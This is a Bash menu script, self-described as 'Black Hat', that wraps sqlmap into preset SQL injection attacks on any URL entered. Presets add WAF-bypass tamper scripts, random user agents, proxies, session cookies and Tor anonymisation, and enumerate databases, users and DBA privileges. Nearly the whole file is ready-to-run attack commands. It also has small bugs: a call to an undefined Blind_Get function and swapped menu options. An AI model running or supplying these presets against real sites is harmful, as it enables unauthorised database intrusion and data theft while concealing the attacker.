SqlMap [expert]

#!/bin/bash

######################
#    APRESENTACAO    #
######################

# Apresentacao
apresentacao()
{
    clear
    printf "     \e[1;92m.-\"\"\"\"-. \e[0m\n"
    printf "    \e[1;92m/        \ \e[0m\n"
    printf " \e[1;77m  \e[0m\e[1;92m/_        _\ \e[0m\n"
    printf "\e[1;77m  \e[0m\e[1;92m// \      / \\ \e[0m\n"
    printf "\e[1;77m  \e[0m\e[1;92m|\__\    /__/ \e[0m\n"
    printf "\e[1;77m  \e[0m\e[1;92m\    ||    / \e[0m\n"
    printf "\e[1;77m   \e[0m\e[1;92m\        / \e[0m\n"
    printf "\e[1;92m \e[0m   \e[1;92m\  __  / \e[0m\n"
    printf "     \e[1;92m'.__.' \e[0m\n\n"
    echo -e "\033[01;33m###################################\033[01;37m"
    echo -e "\033[01;32m Desenvolvido por DarProgrammer000\033[01;37m"
    echo -e "\033[01;31m Black Hat \033[01;37m"
    echo -e "\033[01;33m###################################\033[01;37m"
    echo ""
}

#####################
#    METODOS GET    #
#####################

Geral_Get()
{
    # Comando
    clear
    sqlmap -u "$URL" --dbs --mobile --random-agent --batch
}

Mysql_Get()
{
    clear
    sqlmap -u "$URL" --dbs --dbms="mysql" --tamper="modsecurityzeroversioned.py" --mobile --random-agent --batch
}

Cookie_Get()
{
    echo -e -n "\033[01;32m\n + Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
        read COOKIE

    # Comando
    clear
    sqlmap -u "$URL" --cookie="$COOKIE" --dbs --mobile --random-agent --batch
}

Proxy_Get()
{
    echo -e -n "\033[01;32m\n + Proxy (Ex: http://211.252.169.8): \033[00;37m"
    read PROXY

    echo -e -n "\033[01;33m\n + Porta (Ex: 8080): \033[00;37m"
    read PORTA

    # Comando
    clear
    sqlmap -u "$URL" --proxy="$PROXY:$PORTA" --dbs --mobile --random-agent --batch
}

Advanced_Get()
{
    echo -e -n "\033[01;32m\n + Proxy (Ex: http://211.252.169.8): \033[00;37m"
    read PROXY

    echo -e -n "\033[01;33m\n + Porta (Ex: 8080): \033[00;37m"
    read PORTA

    echo -e -n "\033[01;34m\n + Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
    read COOKIE

    # Comando
        clear
        sqlmap -u "$URL" --cookie="$COOKIE" --proxy="$PROXY:$PORTA" --dbs --level=3 --risk=3 --current-user --current-db --is-dba --banner --mobile --random-agent --batch
}

Strong_Get()
{
    echo -e -n "\033[01;34m\n + Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
    read COOKIE
    clear

    # Comando
    sqlmap -u "$URL" --cookie="$COOKIE" --dbs --is-dba --banner --current-db --current-user --parse-errors --safe-url=2 --safe-freq=3 --risk=3 --level=3 --threads=10 --no-cast --technique=BEUSQT --tamper="unmagicquotes.py,between.py,charencode.py" --delay=1 --timeout=15 --retries=2 --keep-alive --mobile --random-agent --batch
}

Hardcore_Get()
{
    clear
    echo -e "\033[01;36m ---------------------- \033[01;37m"
    echo -e "\033[01;32m     SQLMAP HardCore    \033[01;37m"
    echo -e "\033[01;34m    DarkProgrammer000   \033[01;37m"
        echo -e "\033[01;36m ---------------------- \033[01;37m"
        echo ""
        echo -e "\033[01;31m * Extremely Dangerous (using TOR): Be Careful Crackers, Hackers, Kiddies \n\033[01;37m"
        echo -e -n "\033[01;34m * Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
        read COOKIE

        # Comando
        sqlmap -u "$URL" --cookie="$COOKIE" --dbs --is-dba --banner --current-db --current-user --parse-errors --safe-url=2 --safe-freq=3 --risk=3 --level=3 --threads=10 --no-cast --technique=BEUSQT --tamper="unmagicquotes.py,between.py,charencode.py" --delay=1 --timeout=15 --retries=2 --keep-alive --tor --tor-type=SOCKS5 --tor-port=9150 --mobile --random-agent --batch
}

######################
#    METODOS POST    #
######################

Geral_Post()
{
    clear
    sqlmap -u "$URL" --forms --dbs --mobile --random-agent --batch
}

Mysql_Post()
{
    clear
    sqlmap -u "$URL" --forms --dbs --dbms="mysql" --tamper="modsecurityzeroversioned.py" --mobile --random-agent --batch
}

Cookie_Post()
{
    echo ""
    echo -e -n "-\033[01;32m + Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
    read COOKIE

    # Comando
    clear
    sqlmap -u "$URL" --cookie="$COOKIE" --forms --dbs --mobile --random-agent --batch
}

Proxy_Post()
{
    echo -e -n "\033[01;32m\n + Proxy (Ex: http://211.252.169.8): \033[00;37m"
    read PROXY

    echo -e -n "\033[01;33m\n + Porta (Ex: 8080): \033[00;37m"
    read PORTA

        # Comando
        clear
        sqlmap -u "$URL" --proxy="$PROXY:$PORTA" --forms --dbs --mobile --random-agent --batch
}

Advanced_Post()
{
    echo -e -n "\033[01;32m\n + Proxy (Ex: http://211.252.169.8): \033[00;37m"
    read PROXY

        echo -e -n "\033[01;33m\n + Porta (Ex: 8080): \033[00;37m"
    read PORTA

        echo -e -n "\033[01;34m\n + Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
    read COOKIE

    # Comando
    clear
    sqlmap -u "$URL" --cookie="$COOKIE" --proxy="$PROXY:$PORTA" --forms --dbs --level=3 --risk=3 --current-user --current-db --is-dba --banner --mobile --random-agent --batch
}

Strong_Post()
{
    echo -e -n "\033[01;34m\n + Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
    read COOKIE
    clear

    # Comando
    sqlmap -u "$URL" --cookie="$COOKIE" --forms --dbs --is-dba --banner --current-db --current-user --parse-errors --safe-url=2 --safe-freq=3 --risk=3 --level=3 --threads=10 --no-cast --technique=BEUSQT --tamper="unmagicquotes.py,between.py,charencode.py" --delay=1 --timeout=15 --retries=2 --keep-alive --mobile --random-agent --batch
}

Hardcore_Post()
{
    clear
    echo -e "\033[01;36m ---------------------- \033[01;37m"
    echo -e "\033[01;32m     SQLMAP HardCore    \033[01;37m"
    echo -e "\033[01;34m    DarkProgrammer000   \033[01;37m"
    echo -e "\033[01;36m ---------------------- \033[01;37m"
    echo ""
        echo -e "\033[01;31m * Extremely Dangerous: Be Careful Crackers, Hackers, Kiddies \n\033[01;37m"
        echo -e -n "\033[01;34m Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
        read COOKIE

    # Comando
        sqlmap -u "$URL" --cookie="$COOKIE" --forms --dbs --is-dba --banner --current-db --current-user --parse-errors --safe-url=2 --safe-freq=3 --risk=3 --level=3 --threads=10 --no-cast --technique=BEUSQT --tamper="unmagicquotes.py,between.py,charencode.py" --delay=1 --timeout=15 --retries=2 --keep-alive --tor --tor-type=SOCKS5 --tor-port=9150 --mobile --random-agent --batch
}

######################
#    METODO BLIND    #
######################

Blind()
{
    apresentacao
    echo -e "\033[01;32m * Existe arquivo header.txt  \033[00;37m"
    echo -e "\033[01;32m [1] Sim                    \033[00;37m"
    echo -e "\033[01;32m [2] Nao                    \033[00;37m"
    echo ""

    # Entrada de dados
    echo -e -n "\033[01;37m + Opc: \033[00;37m"
    read OPC
    echo ""

    # Estrutura de escolha
    case $OPC in
    1)
        sqlmap -r header.txt --dbs --is-dba --banner --current-db --current-user --dbms="" --parse-errors --safe-url=2 --safe-freq=3 --risk=3 --level=3 --threads=10 --no-cast --technique=BEUSQT --tamper="unmagicquotes.py,between.py,charencode.py" --delay=1 --timeout=15 --retries=2 --keep-alive --batch
        ;;

    2)
        # Criacao de arquivo
            echo > header.txt

            # Chamada de Terminal
            gnome-terminal -- vi header.txt
            ;;
    *)
            ;;

    esac
}

#################################
#          ATAQUES GET          #
#################################

Ataques_Get()
{
    # Apresentacao
    apresentacao
    echo -e "\033[01;31m [1] Geral         \033[00;37m"
    echo -e "\033[01;32m [2] Banco [mysql] \033[00;37m"
    echo -e "\033[01;33m [3] Cookie        \033[00;37m"
    echo -e "\033[01;34m [4] Proxy         \033[00;37m"
    echo -e "\033[01;35m [5] Advanced      \033[00;37m"
    echo -e "\033[01;36m [6] Strong        \033[00;37m"
    echo -e "\033[01;31m [7] HardCore      \033[00;37m"
    echo ""

    # Entrada de dados
    echo -e -n "\033[01;37m + Opc: \033[00;37m"
    read OPC

    # Estrutura de decisao
    if (($OPC==8))
    then

        # Chamada de metodo
        Blind_Get

    else

        echo -e -n "\033[01;37m\n + Url: \033[00;37m"
        read URL

        # Estrutura de escolha
        case $OPC in
        1)
            Geral_Get
            ;;

        2)
            Mysql_Get
            ;;

        3)
            Cookie_Get
            ;;

        4)
            Proxy_Get
            ;;

        5)
            Advanced_Get
            ;;

        6)
            Strong_Get
            ;;

        7)
            Hardcore_Get
            ;;

        *)
            ;;

        esac
    fi
}

##################################
#          ATAQUES POST          #
##################################

# POST
Ataques_Post()
{
    # Apresentacao
    apresentacao
    echo -e "\033[01;32m [1] Geral         \033[00;37m"
    echo -e "\033[01;33m [2] Banco [mysql] \033[00;37m"
    echo -e "\033[01;34m [3] Cookie        \033[00;37m"
    echo -e "\033[01;35m [4] Proxy         \033[00;37m"
    echo -e "\033[01;36m [5] Advanced      \033[00;37m"
    echo -e "\033[01;32m [6] Strong        \033[00;37m"
    echo -e "\033[01;31m [7] HardCore      \033[00;37m"

    # Entrada de dados
    echo -e -n "\033[01;37m\n + Opc: \033[00;37m"
    read OPC
    echo -e -n "\033[01;37m\n + Url: \033[00;37m"
    read URL

    # Estrutura de escolha
    case $OPC in

    1) Geral_Post;;
        2) Mysql_Post;;
    3) Proxy_Post;;
        4) Cookie_Post;;
        5) Advanced_Post;;
        6) Strong_Post;;
        7) Hardcore_Post;;
        *) ;;

    esac
}

##############
#    MENU    #
##############

# Apresentacao
apresentacao
echo -e "\033[01;31m # Metodos de ataques: \033[00;37m"
echo -e "\033[01;32m [1] GET               \033[00;37m"
echo -e "\033[01;33m [2] POST              \033[00;37m"
echo -e "\033[01;34m [3] BLIND         \033[00;37m"
echo ""

# Entrada de dados
echo -e -n "\033[01;37m + Opc: \033[00;37m"
read atq
echo ""

# Estrutura de decisao
if (($atq==1))
then
    # Chamada de metodo
    Ataques_Get

elif (($atq==2))
then
    # Chamada de metodo
    Ataques_Post

elif (($atq==3))
then
    # Chamada de metodo
    Blind
fi

#echo ""
#read -p "[ENTER]"